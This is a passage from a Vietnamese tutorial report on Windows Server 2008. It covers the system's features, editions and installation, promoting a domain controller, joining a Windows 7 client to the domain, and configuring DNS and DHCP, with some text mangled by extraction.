peer. Ngày nay, hầu hết các loại phương tiện truyền thông có thể được sử dụng
cho mục đích sao lưu. Ngoài các ổ đĩa truyền thống băng, đĩa CD, DVD, lưu trữ
và thậm chí loại bỏ Network Attached Storage (NAS) thiết bị này là chấp nhận
được. Sự lựa chọn của bạn của phương tiện truyền thông sẽ phụ thuộc vào yêu
cầu cụ thể của bạn sao lưu. Tùy thuộc vào ngân sách của bạn và nhu cầu lưu giữ
dữ liệu của bạn, bất kỳ trong số này sẽ là một giải pháp chấp nhận được. Hãy
chắc chắn rằng bạn có ít nhất một bản sao lưu hàng tuần theo lịch trình, mặc dù
hàng ngày sẽ tốt hơn.
24. CHƯƠNG 3:TỔNG QUAN VỀ WINDOWS
SERVER 2008
I. GIỚI THIỆU WINDOWS SERVER 2008
Microsoft Windows Server 2008 là thế hệ kế tiếp của hệ điều hành
Windows Server, có thể giúp các chuyên gia công nghệ thông tin có thể kiểm
soát tối đa cơ sở hạ tầng của họ và cung cấp khả năng quản lý và hiệu lực chưa
từng có, là sản phẩm hơn hẳn trong việc đảm bảo độ an toàn, khả năng tin cậy
và môi trường máy chủ vững chắc hơn các phiên bản trước đây.
Windows Server 2008 cung cấp những giá trị mới cho các tổ chức bằng
việc bảo đảm tất cả người dùng đều có thể có được những thành phần bổ sung
từ các dịch vụ từ mạng. Windows Server 2008 cũng cung cấp nhiều tính năng
vượt trội bên trong hệ điều hành và khả năng chuẩn đoán, cho phép các quản
trị viên tăng được thời gian hỗ trợ cho các doanh nghiệp.
Windows Server 2008 được thiết kế để cung cấp cho các tổ chức có được nền
tảng sản xuất tốt nhất cho ứng dụng, mạng và các dịch vụ web từ nhóm làm việc
đến những trung tâm dữ liệu với tính năng động, tính năng mới có giá trị và
những cải thiện mạnh mẽ cho hệ điều hành cơ bản.
Cải thiện hệ điều hành cho máy chủ Windows.Thêm vào tính năng mới,
Windows Server 2008 cung cấp nhiều cải thiệm tốt hơn cho hệ điều hành cơ
bản so với hệ điều hành Windows Server 2003.
25. Những cải thiện có thể thấy được gồm có các vấn đề về mạng, các tính
năng bảo mật nâng cao, truy cập ứng dụng từ xa, quản lý role máy chủ tập
trung, các công cụ kiểm tra độ tin cậy và hiệu suất, nhóm chuyển đổi dự phòng,
sự triển khai và hệ thống file.
II. CÁC TÍNH NĂNG CỦA WINDOWS SERVER 2008
1. Công cụ quản trị Server Manager
Server Manager là một giao diện điều khiển được thiết kế để tổ chức và
quản lý một server chạy hệ điều hành Windows Server 2008. Người quản trị có
thể sử dụng Server Manager với những nhiều mục đích khác nhau.
- Quản lý đồng nhất trên một server
- Hiển thị trạng thái hiện tại của server
- Nhận ra các vấn đề gặp phải đối với các role đã đƣợc cài đặt một cách dễ dàng
hơn
- Quản lý các role trên server, bao gồm việc thêm và xóa role
- Thêm và xóa bỏ các tính năng
- Chẩn đoán các dấu hiệu bất thường
- Cấu hình server: có 4 công cụ (Task Scheduler, Windows Firewall, Services và
WMI Control).
- Cấu hình sao lưu và lưu trữ: các công cụ giúp bạn sao lưu và quản lý ổ đĩa là
Windows Server Backup và Disk Management đều nằm trên Server Manager.
2. Windows Server Core
- Server Core là một tính năng mới trong Windows Server 2008. Nó cho phép
có thể cài đặt với mục đích hỗ trợ đặc biệt và cụ thể đối với một số role.
- Tất cả các tương tác với Server Core được thông qua các dòng lệnh.
Server Core mang lại những lợi ích sau:
26. +Giảm thiểu được phần mềm, vì thế việc sử dụng dung lượng ổ đĩa cũng được
giảm. Chỉ tốn khoảng 1GB khi cài đặt.
+ Bởi vì giảm thiểu được phần mềm nên việc cập nhật cũng không nhiều.
+ Giảm thiểu tối đa những hành vi xâm nhập vào hệ thống thông qua các port
được mở mặc định.
+ Dễ dàng quản lý.
- Server Core không bao gồm tất cả các tính năng có sẵn trong những phiên bản
cài đặt Server khác. Ví dụ như .NET Framework hoặc Internet Explorer.
3. PowerShell
- PowerShell là một tập hợp lệnh. Nó kết nối những dòng lệnh shell với một
ngôn ngữ script và thêm vào đó hơn 130 công cụ dòng lệnh(được gọi là
cmdlets).Hiện tại, có thể sử dụng PowerShell trong:
+ Exchange Server
+ SQL Server
+ Terminal Services
+ Active Directory Domain Services.
+ Quản trị các dịch vụ, xử lý và registry.
- Mặc định, Windows PowerShell chưa được cài đặt. Tuy nhiên bạn có thể cài
đặt nó một cách dễ dàng bằng cách sử dụng công cụ quản trị Server Manager
và chọn Features > Add Features
4. Windows Deloyment Services.
- Windows Deployment Services được tích hợp trong Windows Server 2008
cho phép bạn cài đặt hệ điều hành từ xa cho các máy client mà không cần phải
27. cài đặt trực tiếp. WDS cho phép bạn cài đặt từ xa thông qua Image lấy từ DVD
cài đặt. Ngoài ra, WDS còn hỗ trợ tạo Image từ 1 máy tính đã cài đặt sẵn
Windows và đầy đủ các ứng dụng khác.
- Windows Deployment Serviece sử dụng định dạng Windows Image (WIM).
Một cải tiến đặc biệt với WIM so với RIS là WIM có thể làm việc tốt với nhiều
nền tảng phần cứng khác nhau.
5. Terminal Services.
- Terminal Services là một thành phần chính trên Windows Server 2009 cho
phép user có thể truy cập vào server để sử dụng những phần mềm.
- Terminal Services giúp người quản trị triển khai và bảo trì hệ thống phần
mềm trong doanh nghiệp một cách hiệu quả. Người quản trị có thể cài đặt các
chương trình phần mềm lên Terminal Server mà không cần cài đặt trên hệ
thống máy client, vì thế việc cập nhật và bảo trì phần mềm trở nên dễ dàng
hơn.
- Terminal Services cung cấp 2 sự khác biệt cho người quản trị và người dùng
cuối - Dành cho người quản trị: cho phép quản trị có thể kết nối từ xa hệ thống
quản trị bằng việc sử dụng Remote Desktop Connection hoặc Remote Desktop.
- Dành cho người dùng cuối: cho phép người dùng cuối có thể chạy các chương
trình từ Terminal Services server.
6. Network Access Protection
- Network Access Protection (NAP) là một hệ thống chính sách thi hành
(Health Policy Enforcement) được xây dựng trong các hệ điều hành Windows
Server 2008.
28. - Cơ chế thực thi của NAP:
+ Kiểm tra tình trạng an toàn của client.
+ Giới hạn truy cập đối với các máy client không an toàn.
+ NAP sẽ cập nhật những thành phần cần thiết cho các máy client không an
toàn, cho đến khi client đủ điều kiện an toàn.Cho phép client kết nối nếu client
đã thỏa điều kiện.
+ NAP giúp bảo vệ hệ thống mạng từ các client.
+ NAP cung cấp bộ thư viên API (Application Programming Interface), cho
phép các nhà
quản trị lập trình nhằm tăng tính bảo mật cho mình
7. Read-Only Domain Controllers
Read-Only Domain Controller (RODC) là một kiểu Domain Controller
mới trên Windows Server 2008.Với RODC, doanh nghiệp có thể dễ dàng triển
khai các Domain Controller ở những nơi mà sự bảo mật không được đảm bảo
về bảo mật. RODC là một phần dữ liệu của Active Directory Domain Services.
Vì RODC là một phần dữ liệu của ADDS nên nó lưu trữ mọi đối tượng,
thuộc tính và các chính sách giống như domain controller, tuy nhiên mật khẩu
thì bị ngoại trừ.
8. Công nghệ Failover Clustering.
Clustering là công nghệ cho phép sử dụng hai hay nhiều server kết hợp
với nhau để tạo thành một cụm server để tăng cường tính ổn định trong vận
hành.Nếu server này ngưng hoạt động thì server khác trong cụm sẽ đảm nhận
nhiệm vụ mà server ngưng hoạt động đó đang thực hiện nhằm mục đích hoạt
động của hệ thống vẫn bình thường.Quá trình chuyên giao gọi là fail-over.
29. Những phiên bản sau hỗ trợ:
Windows Server 2008 Enterprise
Windows Server 2008 Datacenter
Windows Server 2008 Itanium
9. Windows Firewall with Advance Security
Windows Firewall with Advance Security cho phép người quản trị có thể cấu
hình đa dạng và nâng cao để tăng cường tính bảo mật cho hệ thống.
Windows Firewall with Advance Security có những điểm mới:
Kiểm soát chặt chẽ các kết nối vào và ra trên hệ thống (inbound và outbound)
IPsec được thay thế bằng khái niệm Connection Security Rule, giúp bạn có thể
kiểm soát và quản lý các chính sách, đồng thời giám sát trên firewall. Kết hợp
với Active Directory.
Hỗ trợ đầy đủ IPv6.
III. MỘT SỐ TÍNH NĂNG MỚI CỦA WINDOWS SERVER 2008
1. Công nghệ ảo hóa Hyper-V
Hyper-V là công nghệ ảo hóa server thế hệ mới của Microsoft, sự thay
đổi lớn nhất mà Microsoft mang lại so với phiên bản Windows Server 2003.
Hyper-V hoạt động trên nền hệ điều hành 64-bit. Với Hyper-V,
người sử dụng có thể sở hữu một nền tảng ảo hóa linh hoạt, bảo mật, tối đa
hiệu suất và tiết kiệm chi phí:
Hyper-V có thể thích nghi với doanh nghiệp lớn với hàng nghìn máy tính hoặc
các doanh nghiệp nhỏ hay văn phòng chi nhánh. Hyper-V hỗ trợ bộ nhớ ảo lên
đến 64GB, đa bộ vi xử lý.
Khả năng bảo mật giống như các server vật lý. Kết hợp các cộng cụ bảo mật
Windows Firewall, Network Access Protection…
do đó tính bảo mật tốt như môi trường thật.
30. Hyper-V giúp khai thác tối đa hiệu suất sử dụng phần cứng server. Bằng việc
hợp nhất server, cho phép một server vật lý có thể đóng nhiều vai trò của
nhiều server. Từ đó, tiết kiệm được chi phí từ các khoảng mua server, điện,
không gian và bảo trì.
Hyper-V chỉ có thể hỗ trợ đến 32 bộ vi xử lý.
2. Processor Compatibility Mode
Cho phép di trú các máy ảo sang một máy chủ vật lý khác với một phiên
bản CPU khác (nhưng không phải là CPU của nhà sản xuất khác). Trước đây, để
chuyển một máy ảo Hyper-V sang một phần cứng khác, các CPU phải giống
nhau, điều đó yêu cầu người dùng thường phải mua lại phần cứng mới.
3. File Classification Infrastructure
FCI là một tính năng built-in cho phép các chuyên gia CNTT phân loại và
quản lý dữ liệu trong các máy chủ file. Dữ liệu có thể được phân loại với tác
động doanh nghiệp mức thấp, cao hoặc trung bình, sau đó người dùng có thể
backup các dữ liệu quan trọng nhất dễ dàng hơn và hiệu quả hơn.
4. Quản lý trong ỗ đĩa và file:
Cung cấp khả năng thay đổi kich thước phân vùng.
Shadow Copy hỗ trợ ổ đĩa quang, ổ đĩa mạng.
Distributed File System được cải tiến.
Cải tiến Failover Clustering.
Internet Storage Naming Server cho phép đăng ký, hủy đăng ký tập trung và
truy xuất tới các ổ đĩa cứng iSCS.
5. Cải tiến giao thức và mã hóa
o Hỗ trợ mã hóa 128 và 256 bit cho giao thức chứng thực Keberos.
o Hàm API mã hóa mới hỗ trợ mã hóa vòng elip và cải tiến quản lý chứng chỉ.
31. o Giao thức VPN mới Secure Socket Tunneling Protocol.
o AuthIP được sử dụng trong mạng VPN Ipsec.
o Giao thức Server Message Block 2.0 cung cấp các cải tiến trong truyền thông.
6. Một số tính năng khác
Windows Deployment Services thay thế cho Automated Deployment Services
và Remote Installation Services.
IIS 7 thay thế IIS 6, tăng cường khả năng bảo mật, cải tiến công cụ chuẩn đoán,
hỗ trợ quản lý.
Có thành phần "Desktop Experience" cung cấp khả năng cải tiến giao diện.
IV. CÁC LỢI ÍCH CỦA WINDOWS SERVER 2008
Windows Server 2008 mang đến lợi ích trong bốn lĩnh vực:Web, Ảo hóa,
Bảo mật, Nền tảng vững chắc cho các hoạt động của tổ chức
1. Web
Windows Server 2008 cung cấp một nền tảng đồng nhất để triển khai
dịch vụ Web nhờ tích hợp IIS7.0,ASP.NET,Windows Communication
Foundation và Microsoft Windows SharePoint Services.
Lợi ich của IIS 7.0:
Tinh năng phân tích
Quản trị hiệu quả.
Nâng cao tính bảo mật.
Giảm chi phí hỗ trợ.
Giao diện thân thiện và tiện dụng
Hỗ trợ việc sao chép giữa các site.
Copy dễ dàng các thiết lập của trang web giữa các máy chủ web khác nhau mà
không cần phải thiết lập gì thêm.
Chính sách phân quyền quản trị các ứng dụng và các site rõ ràng
32. 2. Ảo hóa :
Phiên bản 64 bit của Windows Server 2008 được tích hợp sẵn công
nghệ ảo hóa hypervisor :
Cho phép máy ảo tương tác trực tiếp với phần cứng máy chủ hiệu quả hơn.
Có khả năng ảo hóa nhiều hệ điều hành khác nhau trên cùng 1 phần cứng máy
chủ sẽ làm giảm chi phí, tăng hiệu suất sử dụng phần cứng, tối ưu hóa hạ tầng,
nâng cao tính sẵn sàng của máy chủ.
Tiết kiệm chi phí mua sắm bản quyền phần mềm.
Tich hợp và tập trung các ứng dụng phục vụ cho việc truy cập từ xa một cách
dễ dàng bằng cách sử dụng Terminal Services.
3. Bảo mật:
Các tính năng an ninh bao gồm: Network Access Protection, Read-Only
Domain Controller, BitLocker, Windows Firewall… cung cấp các mức bảo vệ
chưa từng có cho hệ thống mạng, dữ liệu và công việc của tổ chức.
3.1. Network Access Protection (NAP):
NAP dùng để thiết lập chính sách mạng đối với các máy trạm khi máy trạm đó
muốn kết nối váo hệ thống mạng của tổ chức. Yêu cầu an ninh đối với máy
trạm được kết nối với hệ thống mạng:
Đã cài đặt phầm mềm diệt virus.
Đã cập nhật phiên bản mới.
Đã cài đặt các bản và lỗi hệ thống hoặc đã cài đặt phần mềm firewall.
33. 3.2. Read-Only Domain Controller (RODC):
Là một kiểu Domain Controller (DC).
- RODC chứa một bản sao các dữ liệu "chỉ đọc" của dữ liệu Active Directory
(AD).
- User không thẻ ghi trực tiếp vào RODC.
- RODC không chứa thông tin về mật khẩu trong AD, mà chỉ caching các users
được phép sử dụng ở đó.
RODC thích hợp cho việc triển khai ở các chi nhánh, nơi có điều kiện bảo
mật kém cũng như trình độ của nhân viên IT còn hạn chế.
3.3. BitLocker:
o Bảo vệ an toàn cho máy chủ, máy trạm, máy tính di động.
o Mã hóa nội dung của ổ đĩa nhằm ngăn cản
o Nâng cao khả năng bảo vệ dữ liệu: kết hợp chức năng mã hóa tập tin hệ thống
và kiểm tra tinh toàn vẹn của các thành phần khi boot.
o Toàn bộ tập tin hệ thống được mã hóa, gồm cả file swap và file hibernation.
3.4. Windows Firewall:
Ngăn chặn các lưu lượng mạng theo cấu hình và các ứng dụng dạng chạy để
bảo vệ mạng khỏi các chương trình và người dùng nguy hiểm.
Hỗ trợ ngăn chặn các thông tin vào và ra.
Sử dụng MMC snap-in ( Windows Firewall with Adbanced Security) để đơn
giản hóa việc cấu hình, quản trị.
V. CÁC PHIÊN BẢN CỦA WINDOWS SERVER 2008
1. Windows Server 2008: ứng dụng cho các trung tâm data lớn, ứng dụng
nghiệp vụ riêng,... khả năng mở rộng cao cho tới 64 bộ xử lý.
34. 2. Windows Server 2008 Standard Edition
Windows Server 2008 Standard là một trong những phiên bản ít tốn kém
nhất của các phiên bản khác nhau có sẵn. Windows Server 2008 Stardard hỗ
trợ tới 4GB RAM và 4 bộ vi xử lý
Chủ yếu nhắm mục tiêu và các doanh nghiệp vừa và nhỏ. Chỉ có thể nâng
cấp lên Windows Server 2008 Standard từ Windows 2000 Server và Windows
Server 2003 Standard Edition.
3. Windows Server 2008 Enterprise Edition
Windows Server 2008 Enterprise Edition cung cấp chức năng lớn hơn và
có khả năng mở rộng hơn so với bản tiêu chuẩn.
Cũng như phiên bản Standard Edition thì phiên bản Enterprise cũng có cả hai
phiên bản 32-bit và 64-bit. Hỗ trợ 8 bộ xử lý và lên tới 64GB bộ nhớ RAM trên
hệ thống 32-bit và 2TB RAM trên hệ thống 64-bit.
Các tính năng khác của ấn bản Doanh nghiệp bao gồm hỗ trợ Clustering
đến 8 nút và Active Directory Federated Services (AD FS).
Các phiên bản Windows Server 2000, Windows 2000 Advanced Server,
Windows Server 2003 Standard Edition và Windows Server 2003 Enterprise
Edition đều có thể được nâng cấp lên Windows Server 2008 Enterprise Edition.
4. Windows Server 2008 Datacenter Edition
Phiên bản Datacenter đại diện cuối cùng của loạt sản phẩm máy chủ
Windows 2008 và mục tiêu là nhiệm vụ quan trọng đòi hỏi các doanh nghiệp ổn
định và mức độ thời gian hoạt động cao. Windows Server 2008 phiên bản Datacenter
là liên hệ chặt chẽ với các phần cứng cơ bản thông qua việc thực hiện tùy chỉnh Hardware
Abstraction Layer (HAL).
35. Windows server 2008 Datacenter cũng hỗ trợ hai phiên bản 32 bit và 64
bit. Nó hỗ trợ 64GB bộ nhớ RAM trên nền 32 bit và lên tới 2TB RAM trên nền 64
bít. Ngoài ra phiên bản này còn hỗ trợ tối thiểu là 8 bộ vi xử lý và tối đa là 64.
Để nâng cấp lên phiên bản này thì phải là các phiên bản Datacenter 2000
và 2003.
5. Windows Web Server 2008
Windows Web Server 2008 là một phiên bản của Windows Server 2008 được
thiết kế chủ yếu cho mục đích cung cấp các dịch vụ web.
Nó bao gồm Internet Information Services (IIS) 7,0 cùng với các dịch vụ liên
quan như Simple Mail Transfer Protocol (SMTP) và Telnet. Nó cũng có các
phiên bản 32-bit và 64-bit, phiên bản và hỗ trợ lên đến 4 bộ vi xử lý. RAM được
giới hạn 4GB và 32GB trên 32-bit và 64-bit hệ thống tương ứng.
Windows Web Server 2008 thiếu nhiều tính năng hiện diện trong các phiên bản
khác như phân nhóm,mã hóa ổ đĩa BitLocker, Multi I/O,Windows Internet
Naming Service (WINS),Removable Storage Management và SAN Management.
CHƯƠNG 4: CÀI ĐẶT WINDOWS SERVER
2008
I. YÊU CẦU PHẦN CỨNG
Phần cứng Yêu cầu tối thiểu Đề nghị
Bộ vi xử lý 1 Ghz (x86), 1,4 Ghz (x64) 2Ghz hoặc lớn hơn
RAM 512MB RAM 2GB
36. Dung lượng
trống
15GB 40GB
Windows Server 2008 hỗ trợ cả 2 cấu trúc vi xử lý 32-bit và 64-bit. Tuy
nhiên, phiên bản mới nhất là Windows Server 2008 R2, Windows Midmarket
Server và Windows Small Business với những tính năng đa dịch vụ, các phiên
bản này chỉ hỗ trợ cấu trúc vi xử lý 64-bit.
RAM hỗ trợ tối đa cho hệ thống 32-bit là 4GB khi chạy phiên bản
Standard Edition và 64GB khi chạy phiên bản Enterprise và Datacenter. Nếu
chạy hệ thống 64-bit, bộ nhớ RAM có thể hỗ trợ lên dến 32GB và 2TB RAM cho
phiên bản Enterprise và Datacenter.
Thêm vào đó, Windows Server 2008
hỗ trợ hệ thống Itanium, tuy nhiên chip xử lí Intel Itanium 2 nhân là cần thiết.
II. CÁC CÁCH CÀI ĐẶT
Có 6 cách cài đặt Windows Server 2008
Tự cài đặt các nâng cấp
Cài đặt từ kịch bản
Sử dụng Sconfig
Visual Core Configurator 2008
Cài đặt bằng cách sử dụng Core Configurator 2.0
Cài đặt trực tiếp từ đĩa CD Windows Server 2008
III. NÂNG CẤP LÊN WINDOWS SERVER 2008
Những phiên bản trước Nâng cấp lên Windows Server 2008
Microsoft Windows Server 2003 R2
Standard, Enterprise hoặc
DatacenterEdition
Hỗ trợ đầy đủ
Microsoft Windows Server 2003 Service
Pack 1(SP1) Standard, Enterprise hoặc
Hỗ trợ đầy đủ
37. Datacenter Edition
Microsoft Windows Server 2003 Service
Pack 2 (SP2) Standard, Enterprise hoặc
Datacenter Edition
Hỗ trợ đầy đủ
Windows NT 4.0 Không hỗ trợ
Windows 2000 Server Không hỗ trợ
Windows XP Không hỗ trợ
Windows Vista Không hỗ trợ
Windows 7 Không hỗ trợ
Để nâng cấp lên phiên bản Windows Server 2008, cần phải chạy các hệ
điều hành ở cấp độ server. Không thể nâng cấp các phiên bản Windows dành
cho người dùng như Windows XP hoặc Windows Vista lên Windows Server
2008.
Để nâng cấp lên Windows Server 2008, hệ thống của bạn phải chạy
Windows Server 2003. Việc nâng cấp từ Windows NT 4.0 và Windows 2000
Server không được hỗ trợ. Việc nâng cấp từ những phiên bản Windows Server
2003 lên phiên bản Windows Server 2008 Server Core không được hỗ trợ. Việc
nâng cấp chỉ thực hiện được ở những phiên bản giống nhau. Khi nâng cấp lên
phiên bản Windows Server 2008, mọi cấu hình thiết lập, file và các chương
trình đều được giữ lại
IV. CÀI ĐẶT WINDOWS SERVER 2008
38. Đặt đĩa CD vào ổ đĩa, khởi động lại máy tính và bắt đầu tiến hành quá trình
cài đặt.
Language to instalk : ngôn ngữ bạn muốn hiển thị.
Time and currency format : định dạng thời gian và tiền tệ.
Keyboard or input method : định dạng bàn phím và phương thức nhập
chữ.Sau khi lựa chọn, click Next để tiếp tục cài đặt
Click Install now để bắt đầu cài đặt.
39. Lựa chọn phiên bản Windows Server thích hợp, ở đây chúng ta chọn
phiên bản Windows Server Standard without Hyper-V. Click Next để tiếp
tục.
40. Tại bảng MICROSOFT PRE-RELEASE SOFTWARE LICENSE TERMS
là những điều khoản sử dụng sản phẩm của Microsoft. Đánh dấu chọn
vào I accept the license terms để chấp nhận những điều khoản đó và
click Next để tiếp tục.
Chọn Custom (advaneced) để tiến hành cài đặt tùy chọn.
Tiếp theo là chọn ổ đĩa để cài dặt Windows. Tiếp tục click Next sau khi đã
chọn ổ đĩa cài đặt.
41. Đợi cho đến khi hoàn tất cài đặt Windows Server 2008
Sau khi hệ thống hoàn tất cái đặt sẽ tự động đăng nhập vời tài khoản
Administrator, tuy nhiên mật khẩu đang ở trạng thái trống (blank) vì thế cần
phải thiết lập mật khẩu ở lần đăng nhập đầu tiên.
Click OK để tiến hành thay đổi mật khẩu.Sau đó đăng nhập vào bằng mật
khẩu vừa thay đổi.
42. Đến đây quá trình cài đặt kết thúc.
CHƯƠNG 5: DỰNG DOMAIN
CONTROLLER
Giống như Windows Server 2003 sẽ vẫn cần chạy dcpromo từ nhắc
lệnh Run, tuy nhiên cần phải cài đặt Active Directory Domain Controller
role, đầu tiên bạn cài đặt role, sau đó chạy dcpromo.Vào Server
ManagerRolesAdd Roles
43. Xuất hiện trang Before You Begin, nhấn Next để tiếp tục.
Chọn Active Directory Domain ServicesAdd Required Features để cài
đặt thêm các tính năng này với Active Directory Server Role.
Sau khi chọn Active Directory DC Server Role, bạn sẽ thấy các thông tin về
Server Role.
Kích Install để cài đặt các file yêu cầu nhằm chạy dcpromo
44. Cài đặt được thực hiện thành công. Kích Close.
Trong bài này, chúng ta sẽ sử dụng 2 máy.
PC1: Là máy sử dụng Windows Server 2008.
PC2: Là máy sử dụng Client sử dụng Windows 7.
Quá trình cài đặt sẽ trải qua 2 bước chính:
Bước 1: Chỉnh Preferred DNS
- Ở bước này chúng ta sẽ chỉnh Preferred DNS về chính máy tính của chúng
ta, ở đây là ip 192.168.1.1.
45. Trong trường hợp giả sử chúng ta quên làm bước này, thì quá trình
nâng cấp vẫn diễn ra bình thường, và Windows sẽ tự chỉnh Preferred DNS
về địa chỉ 192.168.1.1 Nhưng tốt nhất các bạn nên làm bước chỉnh này
Bước 2: Nâng cấp lên Domain Controller
- Bạn vào Start-> Chọn Run, gõ dcpromo và Enter, sau đó lần lượt làm theo
các bước sau:
Tiếp nào.
46. Thao tác này sẽ khởi chạy Welcome to the Active Directory Domain
Service Installation Wizard. Kích Next.
Sau đó tiếp tục nhấn Next.
Trong trang Choose a Deployment Configuration Create a new
domain in a new forest..
47. Trong trang Name the Forest Root Domain, nhập vào tên của miền trong
hộp nhập liệu FQDN of the forest room domain.Nhấn Next để tiếp tục.
Nhấn Next để tiếp tục.
Trong trang Set Forest Functional Level, chọn Windows Server 2008.
Nhấn Next để tiếp tục.
48. Trong trang Additional Domain Controller Options, Chọn DNS server và
kích Next.
Một hộp thoại sẽ xuất hiện nói răng không thể tạo đại biểu cho máy
chủ DNS này vì không thể tìm thấy vùng xác thực hoặc nó không chạy
49. Windows DNS server. Lý do cho điều này là vì đây là DC đầu tiên trên mạng.
Nhấn Next để tiếp tục.
Để lại thư mục Database, Log Files và SYSVOL ,kích Next.
Trong Directory Service Restore Mode Administrator Password,
nhập một mật khẩu mạnh vào các hộp nhập liệu Password và Confirm
password.
50. Xác nhận các thông tin trên trang Summary và kích Next.
51. Active Directory sẽ cài đặt. Đặt một dấu kiểm vào hộp chọn Reboot
on completion để máy tính sẽ tự động khởi động lại khi cài đặt DC được
hoàn tất.
Tham khảo video tại: http://www.youtube.com/watch?v=6CXrntG26r4
CHƯƠNG 6: JOIN DOMAIN
52. Chỉnh ip của máy Windows 7 sao cho cùng địa chỉ của lớp mà ta đã
chọn ở máy Server. Gateway và DNS trỏ về địa chỉ ip của máy Server.
Vào Start click phải computer chọn properties. Chọn change settings.
Click vào mở hộp thoại change.
53. Nhập domain của máy server vào -> OK
Nhập Administrator và pass.
55. CHƯƠNG 7: TRIỂN KHAI CÁC DỊCH VỤ
MẠNG
I. DỊCH VỤ DNS
1. Giới thiệu về DNS
DNS (Domain Name System) Server là máy chủ được dùng để phân giải
domain thành địa chỉ IP và ngược lại. Về cách thức hoạt động, DNS Server lưu
trữ một cơ sở dữ liệu bao gồm các bản ghi DNS và dịch vụ lắng nghe các yêu
cầu.Khi máy client gửi yêu cầu phân giải đến, DNS Server tiến hành tra cứu trong
cơ sở dữ liệu và gửi kết quả tương ứng về máy client.
2. Cài đặt DNS
Vào Server Manager Roles Add Roles.Tại bảng Select Server Roles, chọn
DNS Server
- Sau đó nhấn Next để tiếp tục
- Chọn Instal. Tại bảng Confirm Installation Selections xác nhận việc cài đặt.
56. - Chọn Close để hoàn tất cài đặt.
3. Cấu hình DNS
- Đối với DNS Server,thông thường nên xây dựng đồng thời hai hệ thống là DNS
Server chính (Primary) và DNS Server dự phòng (Secondary) dùng chung một
cơ sở dữ liệu. Với phương pháp này,sẽ hạn chế khả năng dịch vụ DNS bị ngưng
khi có sự cố xảy ra trên hệ thống.
57. - Vào Start Administrative Tools DNS.
- Nhấp chuột phải vào Forward Lookup Zones và chọn New Zone.
-
T
ạ
i
b
ả
n
Welcome to the New Zone Wizard ,chọn Next
58. - Tại bảng Zone Type chọn Primary zone để cấu hình DNS Server chính.
- Chọn Next. Tại bảng Zone Name gõ tên domain vào.
59. - Chọn Next. Tại bảng Zone File, để mặc định. Chọn Next.
- Chọn Next. Tại bảng Completing the New Zone Wizard xem lại thông tin.
- Sau đó chọn Finish để hoàn tất.
- Nhấp chuột phải vào ReverseLookup Zones và chọn New Zone.
60. - Tại bảng Welcome to the New Zone Wizard chọn Next.
- Tại bảng Zone Type chọn Primary zone để cấu hình chức năng reverse cho DNS
Server chính.
- Chọn Next.Tại bảng Reverse Lookup Zone Name chọn kiểu IP cần phân giải. Ở
đây chọn IPv4.
61. - Chọn Next. Điền Network ID và chọn Next.
- Tại bảng Zone File để mặc định. Chọn Next.
- Tại bảng Dynamic Update chọn Allow both nonsecure dynamic updates.
- Chọn Next và xem lại thông tin thiết lập, và sau đó chọn Finish để kết thúc.
Bổ sung các bản ghi DNS vào DNS Server
62. - Start Administrative Tools DNS. Nhấp chuột phải vào zone và chọn New
- Gõ tên host vào mục Name, gõ địa chỉ IP vào mục IP address. Nếu muốn tạo ra
một bản ghi DNS phân giải ngược tương ứng thì đánh dấu chọn Create
associated pointer (PTR) record.
-
S
a
u
đ
ó
chọn Add Host.Xuất hiện thông báo thành công.
63. Kiểm tra
Tham khảo video tại: https://www.youtube.com/watch?v=5AeJ6RpmLYs
II. GIỚI THIỆU DỊCH VỤ DHCP
Dịch vụ DHCP cho phép chúng ta cấp động các thông số cấu hình mạng cho các
máy trạm.(client).
Cơ chế sử dụng các thông số mạng được cấp phát động có ưu điểm hơn so với cơ
chế khai báo tĩnh các thông số mạng như:
Khắc phục được tình trạng đụng địa chỉ IP và giảm chi phí quản trị cho hệ thống
mạng.Giúp cho các nhà cung cấp dịch vụ (ISP) tiết kiệm được số lượng địa chỉ IP
thật (Public IP).Phù hợp cho các máy tính thường xuyên di chuyển qua lại giữa
các mạng.Kết hợp với hệ thống mạng không dây (Wireless) cung cấp các điểm
Hotspot như: nhà ga, sân bay, trường học…
1. Hoạt động của giao thức
Giao thức DHCP làm việc theo mô hình client/server.Khi máy client khởi
động, máy sẽ gửi broadcast gói tin DHCPDISCOVER, yêu cầu một server phục vụ
mình. Gói tin này cũng chứa địa chỉ MAC của máy client.Các máy Server trên
mạng khi nhận được gói tin yêu cầu đó, nếu còn khả năng cung cấp địa chỉ IP,
đều
64. gửi lại cho máy Client gói tin DHCPOFFER, đề nghị cho thuê một địa chỉ IP trong
một khoản thời gian nhất định, kèm theo là một subnet mask và địa chỉ của
Server.
2. Cài đặt trên windows server 2008
- Vào Server Manger Roles Add Roles.
Nhán Nexttrong mục Roles chọn “DHCP Server”. Nhán Next.
Trong bảng này giớ i thiẹu vè DHCP và các điẻm càn lưu ý Things to Note. Tiép tục
nhán Next.
Chọn card mạng sử dụng dịch vụ này ở đay chúng ta chỉ có mọt card mạng nen tiép tục
nhán Next nhán Next.
65. - Trong mục “Parent Domain” đièn ten domain và đièn IP DNS server ở mục
“Preferred DNS…” và nhán Validate đẻ kiẻm tra và xác nhạn tòn tại và tiép tục
nhán Next.
66. -Tiếp tục nhấn next
- Tiép tục nhán Next.
Tiếp tục bấm Next. Trong Bảng Configure DHCPv6 Stateless Mode ta chọn
Disable DHCPv6 stateless mode for this server và bấm Next
67. - Chọn user có quyèn AuthorNext.
Xác nhạn lại thong tin trướ c khi cài đạt dịch vụ DHCP. Bám Install đẻ cài đạt
- Cài đạt Role hoàn tát, và nhán Close
68. 3. Cấu hình DHCP
3.1. Tạo Scop
Vào Administrative ToolsDHCP.
Nhán chuọt phải vào IPv4 và New Scope.
Họp thoại New Scope hiẹn ra và Next.
-
Họp thoại Scope Name vàĐièn ten của scope vào mục Name và nhấn Next.
69. Họp thoại IP Address Range,đièn thong só range IP cáp phát và subnet mask
Next.
-
70. Họp thoại Lease Duration: thờ i gian thue địa chỉ IP mạc định là 8 ngày
- Họp thoại Configuration DHCP Options yeu càu chúng ta cáu hình thong só
dịch vụ của scope ngay bay giờ hoạc đẻ sau. Ơ đay ta chọn No, I will configure
these option later và nhấn Next.
Bấm Fisnish để kết thúc
71. 3.2 Thay đổi options của Scope
- Xỏ scope càn thao tác và chuọt phải scope optionsConfigure Options.
- Hộp thoại Scope Options hiện ra, ở trường Available Options là những thuộc tính
sẵn sàng màchúng ta có thể thay đổi với những thuộc tính đã stick là những thuộc
tính đã được cấu hìnhtrước đó.
- Chúng ta sẽ thử cáu hình default gateway lại cho scope này, chọn Router.
